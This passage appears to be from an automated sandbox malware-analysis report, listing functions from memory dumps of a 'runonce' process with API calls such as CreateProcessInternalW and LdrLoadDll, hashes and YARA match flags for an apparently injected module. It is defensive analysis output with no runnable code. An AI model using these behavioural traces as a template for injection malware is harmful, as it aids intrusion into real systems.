                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 745f205d9b94d8693a79235bd066523bf209cd10a239a3a3ec0dc6850e2f0a23
                                          • Instruction ID: b231d150455ba2b1ee6feabd82b2d91872aed57bdfab845a4d5e345c202765a8
                                          • Opcode Fuzzy Hash: 745f205d9b94d8693a79235bd066523bf209cd10a239a3a3ec0dc6850e2f0a23
                                          • Instruction Fuzzy Hash: EF9002612021400385057158955461A801A8BE0201F91C465E1004590DC53588917135
                                          Function 050C2AC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: f3fe113ba60d1a08f2d4964e6ae0b017e2bfd034ce108f6ab1e988e5ab754528
                                          • Instruction ID: b8fc1c1cecd9ea332785f06833f22e29ac6dc0d44f128b31aeefc5ece8b20b42
                                          • Opcode Fuzzy Hash: f3fe113ba60d1a08f2d4964e6ae0b017e2bfd034ce108f6ab1e988e5ab754528
                                          • Instruction Fuzzy Hash: 8290023160514802D5507158955474A40158BD0301F91C455A0014654DC7658A5576B1
                                          Function 050C34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3b2e68626ae7de9482a8d946c6f4242805d31a77668912e9e5386a21fd608657
                                          • Instruction ID: 79e4b8abb36dd248157f7ae146d0d9a11d6a5e9c364f4a5daa10a6f593450e27
                                          • Opcode Fuzzy Hash: 3b2e68626ae7de9482a8d946c6f4242805d31a77668912e9e5386a21fd608657
                                          • Instruction Fuzzy Hash: F990023160524402D5006158965470A50158BD0201FA1C855A0414568DC7A5895175B2
                                          Function 050C38D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: fa09d3c9305b2a173893dd60472ab1d9fd72d073ac53aba71b8fff1d001cd778
                                          • Instruction ID: 2163a438e93dcd9b9785bf7e2fa021e483fb657e767f2551db06c556bf8c204d
                                          • Opcode Fuzzy Hash: fa09d3c9305b2a173893dd60472ab1d9fd72d073ac53aba71b8fff1d001cd778
                                          • Instruction Fuzzy Hash: F690022124519102D550715C954461A8015ABE0201F91C465A0804594DC56588557231
                                          Function 03100658 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • PostThreadMessageW.USER32(-34715NM,00000111,00000000,00000000), ref: 031006D7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID: -34715NM$-34715NM
                                          • API String ID: 1836367815-3092426006
                                          • Opcode ID: 4b481ae92608985fed24b29d047d955ce244151b6fda4820961c99ec0bf9e985
                                          • Instruction ID: 724ae3a65b0a5370d55c6c8f9d90f907becbfe8c7b884205d1684a8e09e189ad
                                          • Opcode Fuzzy Hash: 4b481ae92608985fed24b29d047d955ce244151b6fda4820961c99ec0bf9e985
                                          • Instruction Fuzzy Hash: 8E01A576D0120C7FDB11EAE48C81EEF7B7CDF89794F058064FA14BB140E6656E068BA1
                                          Function 03100660 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • PostThreadMessageW.USER32(-34715NM,00000111,00000000,00000000), ref: 031006D7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID: -34715NM$-34715NM
                                          • API String ID: 1836367815-3092426006
                                          • Opcode ID: 252c2bb0807d31d14717919abaf09ec075647ff14cf89486de8ffd356ef63522
                                          • Instruction ID: 562e8a9783527f259a5a6faa83e7073fa3d9f400210f875c9fd5f4902dc4c1e0
                                          • Opcode Fuzzy Hash: 252c2bb0807d31d14717919abaf09ec075647ff14cf89486de8ffd356ef63522
                                          • Instruction Fuzzy Hash: 3F01C476D0120C7BDB11EAE48C81DEF7B7CDF88694F048064FA14BB140E6645E068BA1
                                          Function 031127A0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 0311286B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          • Opcode ID: d7234d465d862a04e060ed67ef27d26c92b6055dbb2316bd3fbde86adbe3b0f8
                                          • Instruction ID: e496977a873e698da6be99a005b456f64c0948592b551e6cf180b4877c3457d0
                                          • Opcode Fuzzy Hash: d7234d465d862a04e060ed67ef27d26c92b6055dbb2316bd3fbde86adbe3b0f8
                                          • Instruction Fuzzy Hash: 7431A6B5A01704BBC724DF65D880FDBBBB8FB88700F04462DAA5D5B240D7B07651CBA4
                                          Function 0310E825 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 105COMMON
                                          Download Yara Rule
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 0310E847
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Initialize
                                          • String ID: @J7<
                                          • API String ID: 2538663250-2016760708
                                          • Opcode ID: 804d6e634cd60fbf2a4739bc3b470ba7a390625aaa89991191acf5b01a31d8f2
                                          • Instruction ID: 2a52e3172768c6297389e4449261fefc69052e42404ed7307b9f0087790a0366
                                          • Opcode Fuzzy Hash: 804d6e634cd60fbf2a4739bc3b470ba7a390625aaa89991191acf5b01a31d8f2
                                          • Instruction Fuzzy Hash: FC3193B5A0060A9FDB00DFD9C8809EFB3B9BF88304B108959E545EB200D770EE01CBA0
                                          Function 0310E830 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                          Download Yara Rule
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 0310E847
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Initialize
                                          • String ID: @J7<
                                          • API String ID: 2538663250-2016760708
                                          • Opcode ID: 1d9eb1ca0badb408c119c793d16bd3e54afcbfdcb6a76acd58e629f81bacce2e
                                          • Instruction ID: 872b39275addc806aed5c4f5532cc630d4f3ff521a5b045251ffaf48619321b7
                                          • Opcode Fuzzy Hash: 1d9eb1ca0badb408c119c793d16bd3e54afcbfdcb6a76acd58e629f81bacce2e
                                          • Instruction Fuzzy Hash: C0316EB6A0060AAFDB00DFD9D8809EFB7B9BF88304B108559E555EB244D770EE05CBA0
                                          Function 03104050 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 031040C2
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 3cbafcbb204b78bcf82abb4cf732ec46d42f0b04ed4e9d16c39dafc5bdaef8ad
                                          • Instruction ID: 28fa1f958eeeb1e513a35b8e0426d692600b8287d0c7854b7b4a663b1ed2ef81
                                          • Opcode Fuzzy Hash: 3cbafcbb204b78bcf82abb4cf732ec46d42f0b04ed4e9d16c39dafc5bdaef8ad
                                          • Instruction Fuzzy Hash: E70152B9D4020DABDF10DBA0DD41FDDB7789F08218F0441A4EA08AB180F771EB54CB91
                                          Function 03117FD0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessInternalW.KERNELBASE(?,?,?,?,03107963,00000010,?,?,?,00000044,?,00000010,03107963,?,?,?), ref: 03118030
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          • Opcode ID: 1b88c08b8088f465923f3ffb04a1ed128a6d89f32eee60c383e1f7b2e330f75a
                                          • Instruction ID: dc2678e67a23ba4e8031e7d2d3ccc4946c016f4c3c1a604ac869cefeb863046b
                                          • Opcode Fuzzy Hash: 1b88c08b8088f465923f3ffb04a1ed128a6d89f32eee60c383e1f7b2e330f75a
                                          • Instruction Fuzzy Hash: CA01C0B6215208BFCB44DE99DC80EDB77ADAFCC754F418208BA09E7241D630F8518BA4
                                          Function 030F93E0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 030F9425
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: 28ea17ee74544b04e021be67550939db9f9d60b18f20beaad2f1db51a5c86f87
                                          • Instruction ID: 292ba8f2a1910cb1d8e8171677c20ea5d49210afb11aedf7e894f911e86cfd0a
                                          • Opcode Fuzzy Hash: 28ea17ee74544b04e021be67550939db9f9d60b18f20beaad2f1db51a5c86f87
                                          • Instruction Fuzzy Hash: 69F0ED333847043BE230A2AA9C02FDBB39CCB84AA0F140029F70CEB1C0DAA6B45042A4
                                          Function 03116C10 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 03116C53
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Path$NameName_
                                          • String ID:
                                          • API String ID: 3514427675-0
                                          • Opcode ID: d2ed25a3e1f9f5ba5f7df68bf9765a6ba10a95af6fd925d5198e3924a6d81a9a
                                          • Instruction ID: bca099f3c4a2bce093d72ac1e8f3ec23943e3512897d5cf64f15d0606892d746
                                          • Opcode Fuzzy Hash: d2ed25a3e1f9f5ba5f7df68bf9765a6ba10a95af6fd925d5198e3924a6d81a9a
                                          • Instruction Fuzzy Hash: F9F039B9200609BBCA10EF59DC40EEB77ADEFC8760F408019FA08A7241DA30B9118BB4
                                          Function 03117F40 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,10768B0C,00000007,00000000,00000004,00000000,03103931,000000F4,?,?,?,?,?), ref: 03117F7C
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 175eaed759ef3ec92ca1b5799da392e4e14deb7affdea4c76855f511c58b7ac1
                                          • Instruction ID: 04d84bb948d9aef8290759abc593ae6c50a2d244fd2d78b6a679a361e7084e26
                                          • Opcode Fuzzy Hash: 175eaed759ef3ec92ca1b5799da392e4e14deb7affdea4c76855f511c58b7ac1
                                          • Instruction Fuzzy Hash: E8E03276200304BFE618EF58DC40EDB73ACEFC8660F408018FA08AB240DA61BA108AB4
                                          Function 03117EF0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(03101279,?,03114A39,03101279,031142B7,03114A39,?,03101279,031142B7,00001000,?,?,031197D0), ref: 03117F2F
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 8808a138086d4d073c0b21786f2ebbbcccc174c20d674ad8e5d0e9dad5b340c7
                                          • Instruction ID: 3beb5f76ea9a1d73e7c187a3d7f5edc64511bd4ccfccf66471a82e964725921d
                                          • Opcode Fuzzy Hash: 8808a138086d4d073c0b21786f2ebbbcccc174c20d674ad8e5d0e9dad5b340c7
                                          • Instruction Fuzzy Hash: 87E065B6240304BFD614EE68DC40FEB73ACEFC9760F404419FA08AB240DA31B9208BB4
                                          Function 031079A0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 031079CC
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: ad740dcbe00d0110e469244627047f3d8634431cd86aa3d58fe8e3c17c29bbd8
                                          • Instruction ID: b67075d1009b05757056e328f84f60e308be13d0eb9c85e13569f2edb988819a
                                          • Opcode Fuzzy Hash: ad740dcbe00d0110e469244627047f3d8634431cd86aa3d58fe8e3c17c29bbd8
                                          • Instruction Fuzzy Hash: CDE04F7564030827EA24AAA89C45B6633588B4C674F2C4661B99C9F2C1E6B9F9528250
                                          Function 031077B0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,?,03101560,031169D7,031142B7,?), ref: 031077E3
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: fc69b807da4b6940f8e3d7f693b34d15fbd200cb04ebb0917274bc6344d999d9
                                          • Instruction ID: 0d307e6f51e22c789a86c620513fe8d1559cb4470e19ca144f809f9586fbda2c
                                          • Opcode Fuzzy Hash: fc69b807da4b6940f8e3d7f693b34d15fbd200cb04ebb0917274bc6344d999d9
                                          • Instruction Fuzzy Hash: BDD05E76A443043BF610E6B59C06F56328C9B986A4F084464BA0CEB2C1EA66F1604665
                                          Function 031077A7 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,?,03101560,031169D7,031142B7,?), ref: 031077E3
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 6f6a2a1927d742beeca50d91abeb8d3d9a9bb2e91decc011d8aad44d937cd0ac
                                          • Instruction ID: 730c927f7ad50fa15d342ea375823be1b9636c3488ec0f0c9e984b28f2ca1491
                                          • Opcode Fuzzy Hash: 6f6a2a1927d742beeca50d91abeb8d3d9a9bb2e91decc011d8aad44d937cd0ac
                                          • Instruction Fuzzy Hash: C3E0C276A403003BF210E6B0CC46F49729CD788294F084464B50CFB2C1E666F21087A1
                                          Function 050C2B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: c1b98406b87105a47101aa32cd79ab4ea33c1534ed716e3102b8942b8ae62837
                                          • Instruction ID: 7752be9822d7bbd6547961d203c076d587163f14c54bfc615817bbfee01e7d04
                                          • Opcode Fuzzy Hash: c1b98406b87105a47101aa32cd79ab4ea33c1534ed716e3102b8942b8ae62837
                                          • Instruction Fuzzy Hash: D9B09B719015C5C5DA51D7605708B1F7D517BD1701F55C495D1460681E4738C091F175

                                          Non-executed Functions

                                          Function 03101F80 Relevance: .0, Instructions: 17COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2532885e8bf1f19f57d41d0805e1096ec583b42cb2407dae07c65ad6ad90810a
                                          • Instruction ID: ae7f216e3cde0be617e9aea4c0c6f54595e36b80b6a88ad3508be1796f4ed994
                                          • Opcode Fuzzy Hash: 2532885e8bf1f19f57d41d0805e1096ec583b42cb2407dae07c65ad6ad90810a
                                          • Instruction Fuzzy Hash: B0B09B53F451181546144C6B38461B5E374C6CB465920666AE94EF32515511C41601DD
                                          Function 030FDCB1 Relevance: .0, Instructions: 14COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 504ce6c3cf38dd34e167d8ff1e6e7928915dc5e7e03d5bba5dc7b3aa3e46e0c0
                                          • Instruction ID: 8d32bfae5b89461c0991022e084c8da6d3b796d19b7511df112ae34964cfb8d1
                                          • Opcode Fuzzy Hash: 504ce6c3cf38dd34e167d8ff1e6e7928915dc5e7e03d5bba5dc7b3aa3e46e0c0
                                          • Instruction Fuzzy Hash: 92C08C32E5410542CA308C0CA8022B1F370E78B233F4023B7DC28F71C08256A8728688
                                          Function 050B7550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                          Download Yara Rule
                                          Strings
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 050F4507
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 050F4530
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 050F4592
                                          • Execute=1, xrefs: 050F451E
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 050F4460
                                          • ExecuteOptions, xrefs: 050F44AB
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 050F454D
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 0-484625025
                                          • Opcode ID: bb7425fb4e086b9eb120a3543e30383a5e76075d4e0f77d0f809bfbd0f88926e
                                          • Instruction ID: d772d56d8d36bf1e6cf42f870268c73d83ccb359de7d4ed844b192ae8ec7b401
                                          • Opcode Fuzzy Hash: bb7425fb4e086b9eb120a3543e30383a5e76075d4e0f77d0f809bfbd0f88926e
                                          • Instruction Fuzzy Hash: D351D531A042196AEF10EAA4FCD9FFE77A9EF54700F0405A9E506A7181EBB09B45CB94
                                          Function 05089046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $$@
                                          • API String ID: 0-1194432280
                                          • Opcode ID: 28fdeb6cae73861aa2cf15db1aea2ab88c59eba0588489e034ade9f668730863
                                          • Instruction ID: cd34519abf5965a3fc3d2f2e12b542a73b08510f838bc8da1702221a3404cd12
                                          • Opcode Fuzzy Hash: 28fdeb6cae73861aa2cf15db1aea2ab88c59eba0588489e034ade9f668730863
                                          • Instruction Fuzzy Hash: C4814CB1D002699FDB35DB54DC45BEEB7B8BB08710F1445DAA90AB7290D7305E84CFA0